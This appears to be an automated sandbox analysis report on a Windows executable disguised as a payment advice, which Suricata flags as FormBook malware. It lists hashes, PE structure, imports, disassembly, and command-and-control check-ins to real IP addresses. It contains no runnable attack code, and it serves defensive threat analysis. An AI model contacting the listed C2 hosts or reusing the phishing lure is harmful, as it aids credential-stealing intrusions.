                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\togging

                        Download File
                        Process:C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):289280
                        Entropy (8bit):7.995028233048442
                        Encrypted:true
                        SSDEEP:6144:nsAWVTZRe1ZWYBXCbGeIWF7+7fvy6JJmzrE+oMZg6Is1:sVVTZRe3WYcieIkC7y6fmHE+O6I4
                        MD5:6D7B0C36929F13D7DE7041B0D1E7DEA8
                        SHA1:7C5BE2636EF1BBCE840676610E21D6F228A91690
                        SHA-256:9D02CFB22121DF1017E259AACDB7A6B6BA59AF849EEA26E67CC3BAC6E5D93243
                        SHA-512:6FD07358A958DDA5C995D9C676618582419C5C11A089D18CDA2C059FA68C0F15F40B5A8F01C6673E10730C566B2F936258A521050BAE47F2C0056024E8AF0C6C
                        Malicious:false
                        Reputation:low
                        Preview:|....WYAH...;....}.KA....2M...WYAHYN5266O7A3KBSP631EAOEWYAHY.5268P.O3.K.q.2}.`.->*a8+!R@W[oT ]%-'pTV.74!e>7a...._YR*.L>AfSP631EA6D^.|(>..RQ.rW&.Q....SV.[..e!/.T..../P.a"!;mVT.EAOEWYAH..52z7N7<?."SP631EAO.W[@CXE52n2O7A3KBSP6S$EAOUWYA8]N52v6O'A3K@SP031EAOEW_AHYN5266?3A3IBSP631GA..WYQHY^5266_7A#KBSP63!EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYo<<6A266.`E3KRSP6k5EA_EWYAHYN5266O7A.KB3P631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP631EAOEWYAHYN5266O7A3KBSP63

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.526045147661193
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 95.11%
                        • AutoIt3 compiled script executable (510682/80) 4.86%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:PAYMENT ADVISE#9879058.exe
                        File size:1'352'983 bytes
                        MD5:e4e701c5d72fe6e72d12c76b44b7436b
                        SHA1:96828696a33ba584ea0346dcf7b7f4de19eff9b3
                        SHA256:24425aff6c4937fb1b26f04ded8069e7efc4873dbd2fe5c205c52181d8e9ba4e
                        SHA512:9f783fbb518237764dc1b646525ca1b8140672071e4c79993335c1f992177717b93630d7e9f3c00949e004522ec23edab2717e55bf0730a705df484689b4bf0f
                        SSDEEP:24576:ffmMv6Ckr7Mny5QLaTMLhw2JIais52y1TucazGHrAEV:f3v+7/5QLaCm2JIaisoqunzGxV
                        TLSH:9E55F112B7D680B6DDA33971197BE32AEB3575194337C58BA7E02F778E201409B363A1
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                        File Icon

                        Icon Hash:1733312925935517

                        Static PE Info

                        General

                        Entrypoint:0x416310
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:TERMINAL_SERVER_AWARE
                        Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:0
                        File Version Major:5
                        File Version Minor:0
                        Subsystem Version Major:5
                        Subsystem Version Minor:0
                        Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                        Entrypoint Preview

                        Instruction
                        call 00007F61E87A977Ch
                        jmp 00007F61E879D54Eh
                        int3
                        int3
                        int3
                        int3
                        int3
                        int3
                        push ebp
                        mov ebp, esp
                        push edi
                        push esi
                        mov esi, dword ptr [ebp+0Ch]
                        mov ecx, dword ptr [ebp+10h]
                        mov edi, dword ptr [ebp+08h]
                        mov eax, ecx
                        mov edx, ecx
                        add eax, esi
                        cmp edi, esi
                        jbe 00007F61E879D6DAh
                        cmp edi, eax
                        jc 00007F61E879D87Ah
                        cmp ecx, 00000100h
                        jc 00007F61E879D6F1h
                        cmp dword ptr [004A94E0h], 00000000h
                        je 00007F61E879D6E8h
                        push edi
                        push esi
                        and edi, 0Fh
                        and esi, 0Fh
                        cmp edi, esi
                        pop esi
                        pop edi
                        jne 00007F61E879D6DAh
                        pop esi
                        pop edi
                        pop ebp
                        jmp 00007F61E879DB3Ah
                        test edi, 00000003h
                        jne 00007F61E879D6E7h
                        shr ecx, 02h
                        and edx, 03h
                        cmp ecx, 08h
                        jc 00007F61E879D6FCh
                        rep movsd
                        jmp dword ptr [00416494h+edx*4]
                        nop
                        mov eax, edi
                        mov edx, 00000003h
                        sub ecx, 04h
                        jc 00007F61E879D6DEh
                        and eax, 03h
                        add ecx, eax
                        jmp dword ptr [004163A8h+eax*4]
                        jmp dword ptr [004164A4h+ecx*4]
                        nop
                        jmp dword ptr [00416428h+ecx*4]
                        nop
                        mov eax, E4004163h
                        arpl word ptr [ecx+00h], ax
                        or byte ptr [ecx+eax*2+00h], ah
                        and edx, ecx
                        mov al, byte ptr [esi]
                        mov byte ptr [edi], al
                        mov al, byte ptr [esi+01h]
                        mov byte ptr [edi+01h], al
                        mov al, byte ptr [esi+02h]
                        shr ecx, 02h
                        mov byte ptr [edi+02h], al
                        add esi, 03h
                        add edi, 03h
                        cmp ecx, 08h
                        jc 00007F61E879D69Eh

                        Rich Headers

                        Programming Language:
                        • [ASM] VS2008 SP1 build 30729
                        • [ C ] VS2008 SP1 build 30729
                        • [C++] VS2008 SP1 build 30729
                        • [ C ] VS2005 build 50727
                        • [IMP] VS2005 build 50727
                        • [ASM] VS2008 build 21022
                        • [RES] VS2008 build 21022
                        • [LNK] VS2008 SP1 build 30729

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                        RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                        RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                        RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                        RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                        RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                        RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                        RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                        RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                        RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                        RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                        RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                        RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                        RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                        RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                        RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                        RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                        RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                        RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                        RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                        RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                        RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                        RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                        RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                        RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                        RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                        RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                        Imports

                        DLLImport
                        WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                        VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                        COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                        MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                        PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                        USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                        KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                        USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                        GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                        ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                        SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                        ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                        OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishGreat Britain
                        EnglishUnited States

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-10T10:08:18.483326+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44990762.149.128.4080TCP
                        2024-10-10T10:08:34.440731+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450003203.161.43.24580TCP
                        2024-10-10T10:08:37.020990+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450004203.161.43.24580TCP
                        2024-10-10T10:08:39.615822+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450005203.161.43.24580TCP
                        2024-10-10T10:08:42.116891+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450006203.161.43.24580TCP
                        2024-10-10T10:08:48.100718+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450007104.21.11.3180TCP
                        2024-10-10T10:08:50.709021+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450008104.21.11.3180TCP
                        2024-10-10T10:08:53.310542+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450009104.21.11.3180TCP
                        2024-10-10T10:08:55.807280+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450010104.21.11.3180TCP
                        2024-10-10T10:09:01.906668+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450011154.23.184.24080TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 10, 2024 10:08:17.807339907 CEST4990780192.168.2.462.149.128.40
                        Oct 10, 2024 10:08:17.812402964 CEST804990762.149.128.40192.168.2.4
                        Oct 10, 2024 10:08:17.812504053 CEST4990780192.168.2.462.149.128.40
                        Oct 10, 2024 10:08:17.851444006 CEST4990780192.168.2.462.149.128.40
                        Oct 10, 2024 10:08:17.856275082 CEST804990762.149.128.40192.168.2.4
                        Oct 10, 2024 10:08:18.483115911 CEST804990762.149.128.40192.168.2.4
                        Oct 10, 2024 10:08:18.483144999 CEST804990762.149.128.40192.168.2.4
                        Oct 10, 2024 10:08:18.483169079 CEST804990762.149.128.40192.168.2.4
                        Oct 10, 2024 10:08:18.483185053 CEST804990762.149.128.40192.168.2.4
                        Oct 10, 2024 10:08:18.483198881 CEST804990762.149.128.40192.168.2.4
                        Oct 10, 2024 10:08:18.483237028 CEST804990762.149.128.40192.168.2.4
                        Oct 10, 2024 10:08:18.483325958 CEST4990780192.168.2.462.149.128.40
                        Oct 10, 2024 10:08:18.483371973 CEST4990780192.168.2.462.149.128.40
                        Oct 10, 2024 10:08:18.492444038 CEST4990780192.168.2.462.149.128.40
                        Oct 10, 2024 10:08:18.497328043 CEST804990762.149.128.40192.168.2.4
                        Oct 10, 2024 10:08:33.845673084 CEST5000380192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:33.850488901 CEST8050003203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:33.850574970 CEST5000380192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:33.865459919 CEST5000380192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:33.870392084 CEST8050003203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:34.440344095 CEST8050003203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:34.440617085 CEST8050003203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:34.440731049 CEST5000380192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:35.375643969 CEST5000380192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:36.395641088 CEST5000480192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:36.400574923 CEST8050004203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:36.400707960 CEST5000480192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:36.412528038 CEST5000480192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:36.417551994 CEST8050004203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:37.020725012 CEST8050004203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:37.020905018 CEST8050004203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:37.020989895 CEST5000480192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:37.922591925 CEST5000480192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:38.940999031 CEST5000580192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:38.946707964 CEST8050005203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:38.946789980 CEST5000580192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:38.959624052 CEST5000580192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:38.964570999 CEST8050005203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:38.964631081 CEST8050005203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:38.964638948 CEST8050005203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:38.964761019 CEST8050005203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:38.964771986 CEST8050005203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:38.964780092 CEST8050005203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:38.964788914 CEST8050005203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:38.964936972 CEST8050005203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:38.964988947 CEST8050005203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:39.615544081 CEST8050005203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:39.615767002 CEST8050005203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:39.615822077 CEST5000580192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:40.469402075 CEST5000580192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:41.487695932 CEST5000680192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:41.493611097 CEST8050006203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:41.493722916 CEST5000680192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:41.499671936 CEST5000680192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:41.507030964 CEST8050006203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:42.116027117 CEST8050006203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:42.116782904 CEST8050006203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:42.116890907 CEST5000680192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:42.118747950 CEST5000680192.168.2.4203.161.43.245
                        Oct 10, 2024 10:08:42.124033928 CEST8050006203.161.43.245192.168.2.4
                        Oct 10, 2024 10:08:47.153429985 CEST5000780192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:47.158315897 CEST8050007104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:47.158584118 CEST5000780192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:47.167345047 CEST5000780192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:47.172233105 CEST8050007104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:48.099983931 CEST8050007104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:48.100625992 CEST8050007104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:48.100718021 CEST5000780192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:48.100884914 CEST8050007104.21.11.31192.168.2.4
                        Oct 10, 2024 10:08:48.100996971 CEST5000780192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:48.672795057 CEST5000780192.168.2.4104.21.11.31
                        Oct 10, 2024 10:08:49.698115110 CEST5000880192.168.2.4104.21.11.31
